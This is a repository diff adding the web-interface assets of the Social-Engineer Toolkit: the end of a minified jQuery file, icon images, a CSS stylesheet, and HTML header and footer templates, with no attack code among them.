"string")return zb.call(this,a);else if(!this.length)return this;var f=a.indexOf(" ");if(f>=0){var e=a.slice(f,a.length);a=a.slice(0,f)}f="GET";if(b)if(c.isFunction(b)){d=b;b=null}else if(typeof b==="object"){b=c.param(b,c.ajaxSettings.traditional);f="POST"}var j=this;c.ajax({url:a,type:f,dataType:"html",data:b,complete:function(i,o){if(o==="success"||o==="notmodified")j.html(e?c("<div />").append(i.responseText.replace(tb,"")).find(e):i.responseText);d&&j.each(d,[i.responseText,o,i])}});return this},
serialize:function(){return c.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?c.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||ub.test(this.nodeName)||vb.test(this.type))}).map(function(a,b){a=c(this).val();return a==null?null:c.isArray(a)?c.map(a,function(d){return{name:b.name,value:d}}):{name:b.name,value:a}}).get()}});c.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),
function(a,b){c.fn[b]=function(d){return this.bind(b,d)}});c.extend({get:function(a,b,d,f){if(c.isFunction(b)){f=f||d;d=b;b=null}return c.ajax({type:"GET",url:a,data:b,success:d,dataType:f})},getScript:function(a,b){return c.get(a,null,b,"script")},getJSON:function(a,b,d){return c.get(a,b,d,"json")},post:function(a,b,d,f){if(c.isFunction(b)){f=f||d;d=b;b={}}return c.ajax({type:"POST",url:a,data:b,success:d,dataType:f})},ajaxSetup:function(a){c.extend(c.ajaxSettings,a)},ajaxSettings:{url:location.href,
global:true,type:"GET",contentType:"application/x-www-form-urlencoded",processData:true,async:true,xhr:A.XMLHttpRequest&&(A.location.protocol!=="file:"||!A.ActiveXObject)?function(){return new A.XMLHttpRequest}:function(){try{return new A.ActiveXObject("Microsoft.XMLHTTP")}catch(a){}},accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},etag:{},ajax:function(a){function b(){e.success&&
e.success.call(k,o,i,x);e.global&&f("ajaxSuccess",[x,e])}function d(){e.complete&&e.complete.call(k,x,i);e.global&&f("ajaxComplete",[x,e]);e.global&&!--c.active&&c.event.trigger("ajaxStop")}function f(q,p){(e.context?c(e.context):c.event).trigger(q,p)}var e=c.extend(true,{},c.ajaxSettings,a),j,i,o,k=a&&a.context||e,n=e.type.toUpperCase();if(e.data&&e.processData&&typeof e.data!=="string")e.data=c.param(e.data,e.traditional);if(e.dataType==="jsonp"){if(n==="GET")N.test(e.url)||(e.url+=(ka.test(e.url)?
"&":"?")+(e.jsonp||"callback")+"=?");else if(!e.data||!N.test(e.data))e.data=(e.data?e.data+"&":"")+(e.jsonp||"callback")+"=?";e.dataType="json"}if(e.dataType==="json"&&(e.data&&N.test(e.data)||N.test(e.url))){j=e.jsonpCallback||"jsonp"+sb++;if(e.data)e.data=(e.data+"").replace(N,"="+j+"$1");e.url=e.url.replace(N,"="+j+"$1");e.dataType="script";A[j]=A[j]||function(q){o=q;b();d();A[j]=w;try{delete A[j]}catch(p){}z&&z.removeChild(C)}}if(e.dataType==="script"&&e.cache===null)e.cache=false;if(e.cache===
false&&n==="GET"){var r=J(),u=e.url.replace(wb,"$1_="+r+"$2");e.url=u+(u===e.url?(ka.test(e.url)?"&":"?")+"_="+r:"")}if(e.data&&n==="GET")e.url+=(ka.test(e.url)?"&":"?")+e.data;e.global&&!c.active++&&c.event.trigger("ajaxStart");r=(r=xb.exec(e.url))&&(r[1]&&r[1]!==location.protocol||r[2]!==location.host);if(e.dataType==="script"&&n==="GET"&&r){var z=s.getElementsByTagName("head")[0]||s.documentElement,C=s.createElement("script");C.src=e.url;if(e.scriptCharset)C.charset=e.scriptCharset;if(!j){var B=
false;C.onload=C.onreadystatechange=function(){if(!B&&(!this.readyState||this.readyState==="loaded"||this.readyState==="complete")){B=true;b();d();C.onload=C.onreadystatechange=null;z&&C.parentNode&&z.removeChild(C)}}}z.insertBefore(C,z.firstChild);return w}var E=false,x=e.xhr();if(x){e.username?x.open(n,e.url,e.async,e.username,e.password):x.open(n,e.url,e.async);try{if(e.data||a&&a.contentType)x.setRequestHeader("Content-Type",e.contentType);if(e.ifModified){c.lastModified[e.url]&&x.setRequestHeader("If-Modified-Since",
c.lastModified[e.url]);c.etag[e.url]&&x.setRequestHeader("If-None-Match",c.etag[e.url])}r||x.setRequestHeader("X-Requested-With","XMLHttpRequest");x.setRequestHeader("Accept",e.dataType&&e.accepts[e.dataType]?e.accepts[e.dataType]+", */*":e.accepts._default)}catch(ga){}if(e.beforeSend&&e.beforeSend.call(k,x,e)===false){e.global&&!--c.active&&c.event.trigger("ajaxStop");x.abort();return false}e.global&&f("ajaxSend",[x,e]);var g=x.onreadystatechange=function(q){if(!x||x.readyState===0||q==="abort"){E||
d();E=true;if(x)x.onreadystatechange=c.noop}else if(!E&&x&&(x.readyState===4||q==="timeout")){E=true;x.onreadystatechange=c.noop;i=q==="timeout"?"timeout":!c.httpSuccess(x)?"error":e.ifModified&&c.httpNotModified(x,e.url)?"notmodified":"success";var p;if(i==="success")try{o=c.httpData(x,e.dataType,e)}catch(v){i="parsererror";p=v}if(i==="success"||i==="notmodified")j||b();else c.handleError(e,x,i,p);d();q==="timeout"&&x.abort();if(e.async)x=null}};try{var h=x.abort;x.abort=function(){x&&h.call(x);
g("abort")}}catch(l){}e.async&&e.timeout>0&&setTimeout(function(){x&&!E&&g("timeout")},e.timeout);try{x.send(n==="POST"||n==="PUT"||n==="DELETE"?e.data:null)}catch(m){c.handleError(e,x,null,m);d()}e.async||g();return x}},handleError:function(a,b,d,f){if(a.error)a.error.call(a.context||a,b,d,f);if(a.global)(a.context?c(a.context):c.event).trigger("ajaxError",[b,a,f])},active:0,httpSuccess:function(a){try{return!a.status&&location.protocol==="file:"||a.status>=200&&a.status<300||a.status===304||a.status===
1223||a.status===0}catch(b){}return false},httpNotModified:function(a,b){var d=a.getResponseHeader("Last-Modified"),f=a.getResponseHeader("Etag");if(d)c.lastModified[b]=d;if(f)c.etag[b]=f;return a.status===304||a.status===0},httpData:function(a,b,d){var f=a.getResponseHeader("content-type")||"",e=b==="xml"||!b&&f.indexOf("xml")>=0;a=e?a.responseXML:a.responseText;e&&a.documentElement.nodeName==="parsererror"&&c.error("parsererror");if(d&&d.dataFilter)a=d.dataFilter(a,b);if(typeof a==="string")if(b===
"json"||!b&&f.indexOf("json")>=0)a=c.parseJSON(a);else if(b==="script"||!b&&f.indexOf("javascript")>=0)c.globalEval(a);return a},param:function(a,b){function d(i,o){if(c.isArray(o))c.each(o,function(k,n){b||/\[\]$/.test(i)?f(i,n):d(i+"["+(typeof n==="object"||c.isArray(n)?k:"")+"]",n)});else!b&&o!=null&&typeof o==="object"?c.each(o,function(k,n){d(i+"["+k+"]",n)}):f(i,o)}function f(i,o){o=c.isFunction(o)?o():o;e[e.length]=encodeURIComponent(i)+"="+encodeURIComponent(o)}var e=[];if(b===w)b=c.ajaxSettings.traditional;
if(c.isArray(a)||a.jquery)c.each(a,function(){f(this.name,this.value)});else for(var j in a)d(j,a[j]);return e.join("&").replace(yb,"+")}});var la={},Ab=/toggle|show|hide/,Bb=/^([+-]=)?([\d+-.]+)(.*)$/,W,va=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];c.fn.extend({show:function(a,b){if(a||a===0)return this.animate(K("show",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");
this[a].style.display=d||"";if(c.css(this[a],"display")==="none"){d=this[a].nodeName;var f;if(la[d])f=la[d];else{var e=c("<"+d+" />").appendTo("body");f=e.css("display");if(f==="none")f="block";e.remove();la[d]=f}c.data(this[a],"olddisplay",f)}}a=0;for(b=this.length;a<b;a++)this[a].style.display=c.data(this[a],"olddisplay")||"";return this}},hide:function(a,b){if(a||a===0)return this.animate(K("hide",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");!d&&d!=="none"&&c.data(this[a],
"olddisplay",c.css(this[a],"display"))}a=0;for(b=this.length;a<b;a++)this[a].style.display="none";return this}},_toggle:c.fn.toggle,toggle:function(a,b){var d=typeof a==="boolean";if(c.isFunction(a)&&c.isFunction(b))this._toggle.apply(this,arguments);else a==null||d?this.each(function(){var f=d?a:c(this).is(":hidden");c(this)[f?"show":"hide"]()}):this.animate(K("toggle",3),a,b);return this},fadeTo:function(a,b,d){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:b},a,d)},
animate:function(a,b,d,f){var e=c.speed(b,d,f);if(c.isEmptyObject(a))return this.each(e.complete);return this[e.queue===false?"each":"queue"](function(){var j=c.extend({},e),i,o=this.nodeType===1&&c(this).is(":hidden"),k=this;for(i in a){var n=i.replace(ia,ja);if(i!==n){a[n]=a[i];delete a[i];i=n}if(a[i]==="hide"&&o||a[i]==="show"&&!o)return j.complete.call(this);if((i==="height"||i==="width")&&this.style){j.display=c.css(this,"display");j.overflow=this.style.overflow}if(c.isArray(a[i])){(j.specialEasing=
j.specialEasing||{})[i]=a[i][1];a[i]=a[i][0]}}if(j.overflow!=null)this.style.overflow="hidden";j.curAnim=c.extend({},a);c.each(a,function(r,u){var z=new c.fx(k,j,r);if(Ab.test(u))z[u==="toggle"?o?"show":"hide":u](a);else{var C=Bb.exec(u),B=z.cur(true)||0;if(C){u=parseFloat(C[2]);var E=C[3]||"px";if(E!=="px"){k.style[r]=(u||1)+E;B=(u||1)/z.cur(true)*B;k.style[r]=B+E}if(C[1])u=(C[1]==="-="?-1:1)*u+B;z.custom(B,u,E)}else z.custom(B,u,"")}});return true})},stop:function(a,b){var d=c.timers;a&&this.queue([]);
this.each(function(){for(var f=d.length-1;f>=0;f--)if(d[f].elem===this){b&&d[f](true);d.splice(f,1)}});b||this.dequeue();return this}});c.each({slideDown:K("show",1),slideUp:K("hide",1),slideToggle:K("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"}},function(a,b){c.fn[a]=function(d,f){return this.animate(b,d,f)}});c.extend({speed:function(a,b,d){var f=a&&typeof a==="object"?a:{complete:d||!d&&b||c.isFunction(a)&&a,duration:a,easing:d&&b||b&&!c.isFunction(b)&&b};f.duration=c.fx.off?0:typeof f.duration===
"number"?f.duration:c.fx.speeds[f.duration]||c.fx.speeds._default;f.old=f.complete;f.complete=function(){f.queue!==false&&c(this).dequeue();c.isFunction(f.old)&&f.old.call(this)};return f},easing:{linear:function(a,b,d,f){return d+f*a},swing:function(a,b,d,f){return(-Math.cos(a*Math.PI)/2+0.5)*f+d}},timers:[],fx:function(a,b,d){this.options=b;this.elem=a;this.prop=d;if(!b.orig)b.orig={}}});c.fx.prototype={update:function(){this.options.step&&this.options.step.call(this.elem,this.now,this);(c.fx.step[this.prop]||
c.fx.step._default)(this);if((this.prop==="height"||this.prop==="width")&&this.elem.style)this.elem.style.display="block"},cur:function(a){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null))return this.elem[this.prop];return(a=parseFloat(c.css(this.elem,this.prop,a)))&&a>-10000?a:parseFloat(c.curCSS(this.elem,this.prop))||0},custom:function(a,b,d){function f(j){return e.step(j)}this.startTime=J();this.start=a;this.end=b;this.unit=d||this.unit||"px";this.now=this.start;
this.pos=this.state=0;var e=this;f.elem=this.elem;if(f()&&c.timers.push(f)&&!W)W=setInterval(c.fx.tick,13)},show:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.show=true;this.custom(this.prop==="width"||this.prop==="height"?1:0,this.cur());c(this.elem).show()},hide:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.hide=true;this.custom(this.cur(),0)},step:function(a){var b=J(),d=true;if(a||b>=this.options.duration+this.startTime){this.now=
this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;for(var f in this.options.curAnim)if(this.options.curAnim[f]!==true)d=false;if(d){if(this.options.display!=null){this.elem.style.overflow=this.options.overflow;a=c.data(this.elem,"olddisplay");this.elem.style.display=a?a:this.options.display;if(c.css(this.elem,"display")==="none")this.elem.style.display="block"}this.options.hide&&c(this.elem).hide();if(this.options.hide||this.options.show)for(var e in this.options.curAnim)c.style(this.elem,
e,this.options.orig[e]);this.options.complete.call(this.elem)}return false}else{e=b-this.startTime;this.state=e/this.options.duration;a=this.options.easing||(c.easing.swing?"swing":"linear");this.pos=c.easing[this.options.specialEasing&&this.options.specialEasing[this.prop]||a](this.state,e,0,1,this.options.duration);this.now=this.start+(this.end-this.start)*this.pos;this.update()}return true}};c.extend(c.fx,{tick:function(){for(var a=c.timers,b=0;b<a.length;b++)a[b]()||a.splice(b--,1);a.length||
c.fx.stop()},stop:function(){clearInterval(W);W=null},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(a){c.style(a.elem,"opacity",a.now)},_default:function(a){if(a.elem.style&&a.elem.style[a.prop]!=null)a.elem.style[a.prop]=(a.prop==="width"||a.prop==="height"?Math.max(0,a.now):a.now)+a.unit;else a.elem[a.prop]=a.now}}});if(c.expr&&c.expr.filters)c.expr.filters.animated=function(a){return c.grep(c.timers,function(b){return a===b.elem}).length};c.fn.offset="getBoundingClientRect"in s.documentElement?
function(a){var b=this[0];if(a)return this.each(function(e){c.offset.setOffset(this,a,e)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);var d=b.getBoundingClientRect(),f=b.ownerDocument;b=f.body;f=f.documentElement;return{top:d.top+(self.pageYOffset||c.support.boxModel&&f.scrollTop||b.scrollTop)-(f.clientTop||b.clientTop||0),left:d.left+(self.pageXOffset||c.support.boxModel&&f.scrollLeft||b.scrollLeft)-(f.clientLeft||b.clientLeft||0)}}:function(a){var b=
this[0];if(a)return this.each(function(r){c.offset.setOffset(this,a,r)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);c.offset.initialize();var d=b.offsetParent,f=b,e=b.ownerDocument,j,i=e.documentElement,o=e.body;f=(e=e.defaultView)?e.getComputedStyle(b,null):b.currentStyle;for(var k=b.offsetTop,n=b.offsetLeft;(b=b.parentNode)&&b!==o&&b!==i;){if(c.offset.supportsFixedPosition&&f.position==="fixed")break;j=e?e.getComputedStyle(b,null):b.currentStyle;
k-=b.scrollTop;n-=b.scrollLeft;if(b===d){k+=b.offsetTop;n+=b.offsetLeft;if(c.offset.doesNotAddBorder&&!(c.offset.doesAddBorderForTableAndCells&&/^t(able|d|h)$/i.test(b.nodeName))){k+=parseFloat(j.borderTopWidth)||0;n+=parseFloat(j.borderLeftWidth)||0}f=d;d=b.offsetParent}if(c.offset.subtractsBorderForOverflowNotVisible&&j.overflow!=="visible"){k+=parseFloat(j.borderTopWidth)||0;n+=parseFloat(j.borderLeftWidth)||0}f=j}if(f.position==="relative"||f.position==="static"){k+=o.offsetTop;n+=o.offsetLeft}if(c.offset.supportsFixedPosition&&
f.position==="fixed"){k+=Math.max(i.scrollTop,o.scrollTop);n+=Math.max(i.scrollLeft,o.scrollLeft)}return{top:k,left:n}};c.offset={initialize:function(){var a=s.body,b=s.createElement("div"),d,f,e,j=parseFloat(c.curCSS(a,"marginTop",true))||0;c.extend(b.style,{position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"});b.innerHTML="<div style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;'><div></div></div><table style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;' cellpadding='0' cellspacing='0'><tr><td></td></tr></table>";
a.insertBefore(b,a.firstChild);d=b.firstChild;f=d.firstChild;e=d.nextSibling.firstChild.firstChild;this.doesNotAddBorder=f.offsetTop!==5;this.doesAddBorderForTableAndCells=e.offsetTop===5;f.style.position="fixed";f.style.top="20px";this.supportsFixedPosition=f.offsetTop===20||f.offsetTop===15;f.style.position=f.style.top="";d.style.overflow="hidden";d.style.position="relative";this.subtractsBorderForOverflowNotVisible=f.offsetTop===-5;this.doesNotIncludeMarginInBodyOffset=a.offsetTop!==j;a.removeChild(b);
c.offset.initialize=c.noop},bodyOffset:function(a){var b=a.offsetTop,d=a.offsetLeft;c.offset.initialize();if(c.offset.doesNotIncludeMarginInBodyOffset){b+=parseFloat(c.curCSS(a,"marginTop",true))||0;d+=parseFloat(c.curCSS(a,"marginLeft",true))||0}return{top:b,left:d}},setOffset:function(a,b,d){if(/static/.test(c.curCSS(a,"position")))a.style.position="relative";var f=c(a),e=f.offset(),j=parseInt(c.curCSS(a,"top",true),10)||0,i=parseInt(c.curCSS(a,"left",true),10)||0;if(c.isFunction(b))b=b.call(a,
d,e);d={top:b.top-e.top+j,left:b.left-e.left+i};"using"in b?b.using.call(a,d):f.css(d)}};c.fn.extend({position:function(){if(!this[0])return null;var a=this[0],b=this.offsetParent(),d=this.offset(),f=/^body|html$/i.test(b[0].nodeName)?{top:0,left:0}:b.offset();d.top-=parseFloat(c.curCSS(a,"marginTop",true))||0;d.left-=parseFloat(c.curCSS(a,"marginLeft",true))||0;f.top+=parseFloat(c.curCSS(b[0],"borderTopWidth",true))||0;f.left+=parseFloat(c.curCSS(b[0],"borderLeftWidth",true))||0;return{top:d.top-
f.top,left:d.left-f.left}},offsetParent:function(){return this.map(function(){for(var a=this.offsetParent||s.body;a&&!/^body|html$/i.test(a.nodeName)&&c.css(a,"position")==="static";)a=a.offsetParent;return a})}});c.each(["Left","Top"],function(a,b){var d="scroll"+b;c.fn[d]=function(f){var e=this[0],j;if(!e)return null;if(f!==w)return this.each(function(){if(j=wa(this))j.scrollTo(!a?f:c(j).scrollLeft(),a?f:c(j).scrollTop());else this[d]=f});else return(j=wa(e))?"pageXOffset"in j?j[a?"pageYOffset":
"pageXOffset"]:c.support.boxModel&&j.document.documentElement[d]||j.document.body[d]:e[d]}});c.each(["Height","Width"],function(a,b){var d=b.toLowerCase();c.fn["inner"+b]=function(){return this[0]?c.css(this[0],d,false,"padding"):null};c.fn["outer"+b]=function(f){return this[0]?c.css(this[0],d,false,f?"margin":"border"):null};c.fn[d]=function(f){var e=this[0];if(!e)return f==null?null:this;if(c.isFunction(f))return this.each(function(j){var i=c(this);i[d](f.call(this,j,i[d]()))});return"scrollTo"in
e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window);jQuery.noConflict();

BIN
src/commandcenter/files/logo.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 169 KiB

BIN
src/commandcenter/files/main.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 3.3 KiB

BIN
src/commandcenter/files/mass-mailer.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 3.7 KiB

BIN
src/commandcenter/files/rss.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 7.4 KiB

BIN
src/commandcenter/files/setman.jpg Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 28 KiB

BIN
src/commandcenter/files/spear-phish.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 3.9 KiB

468
src/commandcenter/files/style.css Normal file
View file

@ -0,0 +1,468 @@
/* Lite CSS browser reset - DigiP */
ul li, li, ol, table, tr, td, div, p, blockquote, body, h1, h2, h3, a, img {
border:0px;
margin:0px;
padding:0px;
border-collapse:collapse;
font-weight:normal;
}
body {
background-color:#000;
background-image:url(header.jpg);
background-repeat:repeat-x;
color:#fff;
font-family:"trebuchet ms",arial,sans-serif,"sans serif";
font-size:16px;
}
a {
color:#468dab;
text-decoration:none;
}
a:hover {
color:#41baed;
text-decoration:underline;
}
a img {
border:none;
border-style:none;
}
h1 {
font-size:26px;
color:#468dab;
border-bottom: solid #468dab 1px;
position:relative;
text-align:left;
width:97%;
margin:2px auto 2px auto;
}
.full {
font-size:26px;
color:#468dab;
border-bottom: solid #468dab 1px;
position:relative;
text-align:left;
width:100%;
margin:2px auto 2px auto;
}
h2{
font-size:22px;
margin-bottom:20px;
margin-top:10px;
color:#468dab;
border-bottom: solid #468dab 1px;
position:relative;
text-align:left;
}
h3 {
margin-top:15px;
font-size:18px;
margin-bottom:20px;
color:#468dab;
border-bottom: solid #468dab 1px;
position:relative;
text-align:left;
}
h4 {
margin-top:15px;
font-size:18px;
margin-bottom:20px;
color:#468dab;
border-bottom: solid #468dab 1px;
position:relative;
text-align:left;
}
h1 a, h2 a, h3 a, h4 a {
text-decoration:none;
}
h1 a:hover, h2 a:hover, h3 a:hover, h4 a:hover {
text-decoration:none;
}
.dates:before {
padding:10px 5px 20px 0px;
margin-bottom:10px;
content:url(date-icon.png);
position:relative;
top:10px;
left:-5px;
}
.dates {
border-bottom:none;
margin:0px 20px 20px 20px;
position:relative;
float:right;
font-size:12px;
}
p {
margin-bottom:20px;
}
#header {
width:1110px;
height:335px;
margin-left:auto;
margin-right:auto;
}
#logo {
}
#nav {
text-align:justified;
width:1100px;
}
.nav-button {
padding:2px 1px 3px 1px;
}
.nav-button:hover {
background-color:#121212;
padding:2px 0px 2px 0px;
border-left:solid #444 1px; /* Give buttons slight 3d effect */
border-right:solid #222 1px;
border-bottom:solid #222 1px;
}
#content {
background-color:#212121;
display:block;
text-align:justify;
padding:20px;
width:960px;
height:auto;
margin-left:auto;
margin-right:auto;
margin-bottom:15px;
border-top:solid #468dab 3px; /* two-toned border */
border-right:solid #468dab 3px;
border-bottom:solid #3d738a 3px;
border-left:solid #3d738a 3px;
-webkit-border-radius: 15px; /* webkit non standard, older browser versions */
-moz-border-radius: 0px 15px 15px 15px; /* mozilla non standard, older browser versions */
border-radius: 0px 15px 15px 15px;
}
#content-home {
background-color:#0f0f0f;
display:block;
text-align:justify;
padding:20px;
width:960px;
height:auto;
margin-left:auto;
margin-right:auto;
margin-bottom:15px;
border-top:solid #468dab 3px; /* two-toned border */
border-right:solid #468dab 3px;
border-bottom:solid #3d738a 3px;
border-left:solid #3d738a 3px;
-webkit-border-radius: 15px; /* webkit non standard, older browser versions */
-moz-border-radius: 0px 15px 15px 15px; /* mozilla non standard, older browser versions */
border-radius: 0px 15px 15px 15px;
}
.post-home {
margin-bottom:25px;
}
.post-home .entry p {
font-size:16px;
}
#content-hassidebar {
background-color:#212121;
display:table;
position:relative;
clear:both;
text-align:justify;
padding:20px;
width:960px;
height:auto;
margin-left:auto;
margin-right:auto;
margin-bottom:15px;
border-top:solid #468dab 3px; /* two-toned border */
border-right:solid #468dab 3px;
border-bottom:solid #3d738a 3px;
border-left:solid #3d738a 3px;
-webkit-border-radius: 15px; /* webkit non standard, older browser versions */
-moz-border-radius: 0px 15px 15px 15px; /* mozilla non standard, older browser versions */
border-radius: 0px 15px 15px 15px;
}
.post {
border:solid #333 1px;
margin-bottom:25px;
background-color:#0f0f0f;
-webkit-border-radius: 15px; /* webkit non standard, older browser versions */
-moz-border-radius: 0px 15px 15px 15px; /* mozilla non standard, older browser versions */
border-radius: 0px 15px 15px 15px;
}
.post-hassidebar {
margin:15px -10px 25px 15px;
border:solid #333 1px;
background-color:#0f0f0f;
-webkit-border-radius: 15px; /* webkit non standard, older browser versions */
-moz-border-radius: 0px 15px 15px 15px; /* mozilla non standard, older browser versions */
border-radius: 0px 15px 15px 15px;
width:630px;
float:left;
display:block;
}
.post .entry, .post-hassidebar .entry {
padding:15px;
}
.post .entry p {
font-size:16px;
}
.entry img {
max-width:550px;
width: expression(this.width > 550 ? 550: true); /* IE hack since it doesn't recognize max-width standard */
}
.entry object {
display:block;
position:relative;
clear:both;
margin:15px auto 15px auto;
border-top:solid #122d39 7px;
border-right:solid #122d39 7px;
border-bottom:solid #0f232b 7px;
border-left:solid #0f232b 7px;
-webkit-border-radius: 0px 7px 7px 7px; /* webkit non standard, older browser versions */
-moz-border-radius: 7px; /* mozilla non standard, older browser versions */
border-radius: 0px 7px 7px 7px;
max-width:550px;
width: expression(this.width > 550 ? 550: true); /* IE hack since it doesn't recognize max-width standard */
}
.entry embed {
max-width:550px;
width: expression(this.width > 550 ? 550: true); /* IE hack since it doesn't recognize max-width standard */
}
#footer {
margin-bottom:20px;
}
#copyright{
font-size:12px;
}
.navigation {
position:relative;
clear:both;
}
.navigation .nav-old {
float:left;
position:relative;
}
.navigation .nav-newer {
float:right;
position:relative;
}
.sidebarWidgetDigi {
width:230px;
display:block;
padding:20px;
}
.sidebarWidgetDigiH4 {
position:relative;
border:none;
margin-bottom:5px;
}
#sidebar {
width:260px;
position:relative;
margin:15px 15px 25px 20px;
padding:5px 15px 5px 5px;
display:block;
float:right;
border:solid #333 1px;
background-color:#0f0f0f;
-webkit-border-radius: 15px; /* webkit non standard, older browser versions */
-moz-border-radius: 0px 15px 15px 15px; /* mozilla non standard, older browser versions */
border-radius: 0px 15px 15px 15px;
}
#calendar_wrap table {
background-color:#ccc;
border: solid #ccc 1px;
width:100%;
}
#wp-calendar th {
background-color:#aaa;
color:#000;
width:10px;
text-align:center;
}
#wp-calendar td {
width:10px;
background-color:#ccc;
text-indent:7px;
color:#000;
}
#wp-calendar td a {
color:#005da5;
}
#wp-calendar td:hover a:hover {
color:#f5f5f5;
}
#wp-calendar td:hover {
background-color:#606060;
color:#000;
}
#comment {
width:500px;
padding:0px;
margin-left:auto;
margin-right:auto;
}
#commentlist {
list-style-type:none;
border-collapse:collapse;
margin:0px;
padding:0px;
}
#commentlist li {
position:relative;
margin-bottom:20px;
padding:10px 10px 60px 10px;
border:solid #606060 2px;
background-color:#202020;
color:#fff;
-moz-border-radius:8px;
-webkit-border-radius:8px;
border-radius:8px;
}
img.avatar {
position:relative;
float:left;
margin:16px 20px 10px 0px;
border:solid #424242 12px;
-moz-border-radius:8px;
-webkit-border-radius:8px;
border-radius:8px;
clear:both;
}
#digi-comments {
position:relative;
width: 670px;
margin:30px auto 30px auto;
display:block;
padding:50px;
background-color:#000;
clear:both;
-moz-border-radius:5px 5px 10px 10px;
-webkit-border-radius:5px 5px 10px 10px;
border-radius:5px 5px 10px 10px;
}
/* code is old school - Should switch to plugin instead, looks much better and has syntax highlighting, see - http://wordpress.org/extend/plugins/codecolorer/installation/ */
code {
color: #acacac;
background: #222222;
border:solid #434343 1px;
font-size: 14px;
margin: 0px;
padding: 15px;
display: block;
font:11px Monaco, monospace;
}
.shr-bookmarks { /* if using sexy share plugin */
float:left;
position:relative;
margin-right:-30px;
margin-top:-0px;
margin-bottom:20px;
clear:both;
width:550px;
}
.pages_ {
border:solid #606060 2px;
padding:2px 7px 2px 7px;
margin:0px 2px 0px 0px;
background-color:#c4c4c4;
}
.pages_:hover {
border:solid #606060 2px;
padding:2px 7px 2px 7px;
margin:0px 2px 0px 0px;
background-color:#fff;
}
a .pages_:hover {
color:#000;
}
.archives {
clear:both;
}
ul li {
text-align:left;
font-size:14px;
}
#socialmedia2 {
display:none;
}
#socialmedia {
position:fixed;
right:8px;
top:10%;
width:50px;
height:150px;
z-index:9999;
line-height:10px;
}

BIN
src/commandcenter/files/teensy.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 3.8 KiB

BIN
src/commandcenter/files/tweet.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 6.8 KiB

BIN
src/commandcenter/files/updates.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 3.6 KiB

BIN
src/commandcenter/files/web-attack.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 4 KiB

BIN
src/commandcenter/files/wireless.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 3.9 KiB

16
src/commandcenter/footer Normal file
View file

@ -0,0 +1,16 @@
<div id="footer">
<center><span style="color: rgb(102, 102, 102);">Visit us on</span> <span style="color: rgb(70, 141, 171);">irc.freenode.net</span> <span style="color: rgb(102, 102, 102);">#backtrack-linux or #social-engineer</span></center>
<div id="copyright">
<center><a href="http://www.secmaniac.com/">© SecManiac.com All rights reserved.</a></center>
</div>
</div>
<div id="socialmedia">
<a href="http://www.secmaniac.com/feed/"><img src="files/rss.png" alt="RSS Feed" title="RSS Feed"></a><br><br>
<a href="http://twitter.com/dave_rel1k"><img src="files/tweet.png" alt="Twitter" title="Follow Me On Twitter!"></a>
</div>
</body></html>

58
src/commandcenter/header Normal file
View file

@ -0,0 +1,58 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head>
<title>The Social-Engineer Toolkit Web Interface</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=100"> <!-- Force IE8 Compatibility mode OFF -->
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.secmaniac.com/wp-content/themes/SecManiac2010/favicon.ico">
<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://www.secmaniac.com/wp-content/themes/SecManiac2010/favicon.ico">
<link rel="stylesheet" href="files/style.css" type="text/css">
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.secmaniac.com/feed/">
<link rel="alternate" type="text/xml" title="RSS .92" href="http://www.secmaniac.com/feed/rss/">
<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="http://www.secmaniac.com/feed/atom/">
